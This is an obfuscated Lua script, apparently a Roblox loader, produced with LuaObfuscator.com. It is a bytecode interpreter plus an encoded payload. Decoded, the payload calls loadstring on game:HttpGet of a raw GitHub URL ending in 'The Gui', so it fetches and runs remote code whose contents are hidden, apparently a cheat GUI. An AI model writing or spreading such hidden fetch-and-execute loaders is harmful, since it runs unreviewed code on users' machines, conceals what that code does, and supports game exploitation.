--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v81,v19);v19=nil;v90=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 + 0) -0)) -(v32-1)) + (2 -(878 -(282 + 595))))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=0;local v84;while true do if (v83==(931 -(857 + 74))) then v84=((2207 -(1523 + 114)) -(367 + 181 + 20))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end end end local function v21() local v34=0 -(117 -(32 + 85)) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1271 -(226 + 1044) ;end if (v34==(4 -3)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -(184 -(67 + 113))) );v18=v18 + (6 -2) ;return (v41 * (30800116 -(10282612 + 3740288))) + (v40 * 65536) + (v39 * (606 -(87 + 263))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((439 -(145 + 293)) + 0)) then v45=(433 -(44 + 386)) -2 ;v46=(v20(v44,953 -(802 + 150) ,53 -33 ) * (2^(57 -25))) + v43 ;v42=2;end if (v42==(3 + 0)) then if (v47==(997 -(915 + 82))) then if (v46==(0 -0)) then return v48 * ((1486 -(998 + 488)) + 0) ;else local v108=0;while true do if (v108==(0 -0)) then v47=1188 -(340 + 729 + 118) ;v45=0 -0 ;break;end end end elseif (v47==(4477 -2430)) then return ((v46==0) and (v48 * ((1 + 0)/0))) or (v48 * NaN) ;end return v8(v48,v47-(838 + 185) ) * (v45 + (v46/((3 -1)^52))) ;end if ((0 + 0)==v42) then v43=v23();v44=v23();v42=1;end if (v42==(793 -(368 + 423))) then v47=v20(v44,65 -44 ,(821 -(201 + 571)) -((1148 -(116 + 1022)) + 8) );v48=((v20(v44,122 -90 )==(443 -(416 + 26))) and  -(3 -2)) or (1 + 0) ;v42=4 -1 ;end end end local function v25(v49) local v50=(0 -0) -0 ;local v51;local v52;while true do if ((1 + 0)==v50) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=7 -5 ;end if (v50==(0 -(1080 -(1020 + 60)))) then v51=nil;if  not v49 then v49=v23();if (v49==(859 -((2237 -(630 + 793)) + 45))) then return "";end end v50=2 -1 ;end if ((1 + 2)==v50) then return v6(v52);end if (v50==(1 + 1)) then v52={};for v92=886 -(261 + 624) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1905 -(1881 + 24) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (2==v53) then local v87=(function() return 0 -0 ;end)();while true do if (v87~=(1763 -(454 + 1309))) then else v60=(function() return {};end)();for v109= #"}",v59 do local v110=(function() return 0 + 0 ;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (1==v110) then v113=(function() return nil;end)();while true do if (0~=v111) then else local v161=(function() return 0 -0 ;end)();local v162=(function() return;end)();while true do if (v161==(0 -0)) then v162=(function() return 0;end)();while true do if (v162~=1) then else v111=(function() return 1;end)();break;end if (v162==(0 -0)) then v112=(function() return v21();end)();v113=(function() return nil;end)();v162=(function() return 1;end)();end end break;end end end if ((286 -(134 + 151))==v111) then if (v112== #"}") then v113=(function() return v21()~=0 ;end)();elseif (v112==(1667 -(970 + 695))) then v113=(function() return v24();end)();elseif (v112== #"19(") then v113=(function() return v25();end)();end v60[v109]=(function() return v113;end)();break;end end break;end if (v110==0) then v111=(function() return 0;end)();v112=(function() return nil;end)();v110=(function() return 1 -0 ;end)();end end end v87=(function() return 1991 -(582 + 1408) ;end)();end if (v87==(3 -2)) then v58[ #"-19"]=(function() return v21();end)();v53=(function() return 3 -0 ;end)();break;end end end if ((0 -0)~=v53) then else local v88=(function() return 0;end)();while true do if (v88~=(1824 -(1195 + 629))) then else v54=(function() return function(v114,v115,v116) local v117=(function() return 0 -0 ;end)();local v118=(function() return;end)();while true do if (v117==0) then v118=(function() return 241 -(187 + 54) ;end)();while true do if (v118==0) then local v164=(function() return 780 -(162 + 618) ;end)();while true do if (v164~=0) then else v114[v115-#"[" ]=(function() return v116();end)();return v114,v115,v116;end end end end break;end end end;end)();v55=(function() return {};end)();v88=(function() return 1 + 0 ;end)();end if (v88==1) then v56=(function() return {};end)();v53=(function() return 1 + 0 ;end)();break;end end end if (v53==1) then local v89=(function() return 0 -0 ;end)();while true do if (v89==(1 -0)) then v59=(function() return v23();end)();v53=(function() return 1 + 1 ;end)();break;end if (v89~=(1636 -(1373 + 263))) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v89=(function() return 1;end)();end end end if (v53==3) then for v94= #",",v23() do local v95=(function() return v21();end)();if (v20(v95, #"\\", #"{")==(1000 -(451 + 549))) then local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=(1 -0)) then else local v119=(function() return 0 -0 ;end)();while true do if (v119==(1385 -(746 + 638))) then v104=(function() return 2;end)();break;end if (v119==(0 + 0)) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(341 -(218 + 123))) then local v165=(function() return 1581 -(1535 + 46) ;end)();local v166=(function() return;end)();while true do if (0==v165) then v166=(function() return 0 + 0 ;end)();while true do if (v166==(0 + 0)) then v107[ #"xxx"]=(function() return v22();end)();v107[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"|") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==(562 -(306 + 254))) then v107[ #"gha"]=(function() return v23() -((1 + 1)^(30 -14)) ;end)();elseif (v105== #"xxx") then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (0==v181) then v182=(function() return 0;end)();while true do if (v182==(1467 -(899 + 568))) then v107[ #"-19"]=(function() return v23() -((2 + 0)^(38 -22)) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v119=(function() return 1;end)();end end end if (v104~=(603 -(268 + 335))) then else local v120=(function() return 290 -(60 + 230) ;end)();while true do if ((572 -(426 + 146))==v120) then v105=(function() return v20(v95,2, #"19(");end)();v106=(function() return v20(v95, #"?id=",6);end)();v120=(function() return 1 + 0 ;end)();end if (v120~=(1457 -(282 + 1174))) then else v104=(function() return 812 -(569 + 242) ;end)();break;end end end if (v104==3) then if (v20(v106, #"-19", #"nil")== #"[") then v107[ #"xnxx"]=(function() return v60[v107[ #"0313"]];end)();end v55[v94]=(function() return v107;end)();break;end if (v104~=(5 -3)) then else if (v20(v106, #"\\", #"|")~= #"]") then else v107[1 + 1 ]=(function() return v60[v107[2]];end)();end if (v20(v106,1026 -(706 + 318) ,1253 -(721 + 530) )~= #"<") then else v107[ #"xxx"]=(function() return v60[v107[ #"91("]];end)();end v104=(function() return 3;end)();end end end end for v96= #" ",v23() do v56,v96,v28=(function() return v54(v56,v96,v28);end)();end return v58;end end end local function v29(v61,v62,v63) local v64=v61[1272 -(945 + 326) ];local v65=v61[4 -2 ];local v66=v61[3 + 0 ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=701 -(271 + 429) ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if ((v85>=v69) or (2874<=2181)) then v73[v85-v69 ]=v74[v85 + (1501 -(1408 + 92)) ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + ((2329 -1242) -(461 + 183 + 442)) ;local v79;local v80;while true do local v86=1288 -(993 + 295) ;while true do if (v86==(0 + 0 + 0)) then v79=v67[v71];v80=v79[1172 -(151 + 267 + 753) ];v86=(2 -1) + 0 ;end if ((v86==1) or (1869==2009)) then if ((v80<=(1 + 2)) or (3546<2322)) then if (v80<=1) then if (v80>(0 + 0)) then local v125=0 + 0 ;local v126;local v127;local v128;local v129;while true do if ((v125==(530 -(406 + 123))) or (2082==4773)) then v72=(v128 + v126) -(1770 -(1749 + 20)) ;v129=0 + (0 -0) ;v125=1324 -(1249 + 73) ;end if (v125==(0 + 0)) then v126=v79[1147 -(466 + (2230 -(1126 + 425))) ];v127,v128=v70(v77[v126](v13(v77,v126 + (2 -1) ,v79[3])));v125=1;end if (2==v125) then for v173=v126,v72 do v129=v129 + 1 ;v77[v173]=v127[v129];end break;end end else local v130;local v131,v132;local v133;local v134;v77[v79[5 -3 ]]=v63[v79[3]];v71=v71 + (1901 -(106 + 1794)) ;v79=v67[v71];v77[v79[1 + 1 ]]=v63[v79[1 + (407 -(118 + 287)) ]];v71=v71 + (2 -1) ;v79=v67[v71];v134=v79[5 -3 ];v133=v77[v79[117 -(4 + (431 -321)) ]];v77[v134 + (585 -(57 + 527)) ]=v133;v77[v134]=v133[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[1429 -(41 + 1386) ]]=v79[106 -(17 + (1207 -(118 + 1003))) ];v71=v71 + 1 ;v79=v67[v71];v134=v79[2 + 0 ];v131,v132=v70(v77[v134](v13(v77,v134 + (1 -(0 -0)) ,v79[8 -5 ])));v72=(v132 + v134) -(167 -(122 + (421 -(142 + 235)))) ;v130=0 -0 ;for v158=v134,v72 do v130=v130 + (3 -2) ;v77[v158]=v131[v130];end v71=v71 + 1 + 0 ;v79=v67[v71];v134=v79[1 + 1 ];v77[v134]=v77[v134](v13(v77,v134 + 1 ,v72));v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[67 -((136 -106) + 35) ]]();v71=v71 + 1 + 0 ;v79=v67[v71];do return;end end elseif ((3244>1055) and ((v80>2) or (2689<=343))) then local v149=v79[1259 -(1043 + 214) ];v77[v149]=v77[v149](v13(v77,v149 + (3 -2) ,v72));else v77[v79[1214 -(323 + 889) ]]();end elseif ((v80<=(13 -(2 + 6))) or (3313<=1778)) then if (v80>(584 -(361 + (1196 -(553 + 424))))) then v77[v79[322 -((99 -46) + 236 + 31) ]]=v63[v79[1 + 2 ]];else v77[v79[415 -(15 + 398) ]]=v79[985 -(18 + 964) ];end elseif (v80==(22 -16)) then local v155=0 + 0 + 0 ;local v156;local v157;while true do if (v155==(0 + 0)) then v156=v79[2];v157=v77[v79[853 -(20 + 830) ]];v155=1 + 0 ;end if ((v155==(127 -(116 + 10))) or (1421>=2104)) then v77[v156 + 1 ]=v157;v77[v156]=v157[v79[1 + 3 ]];break;end end else do return;end end v71=v71 + (739 -(542 + 196)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F49416D4F6E5461626C65742F53702O6564696E672D57612O6C2F6D61696E2F5468652047756900083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
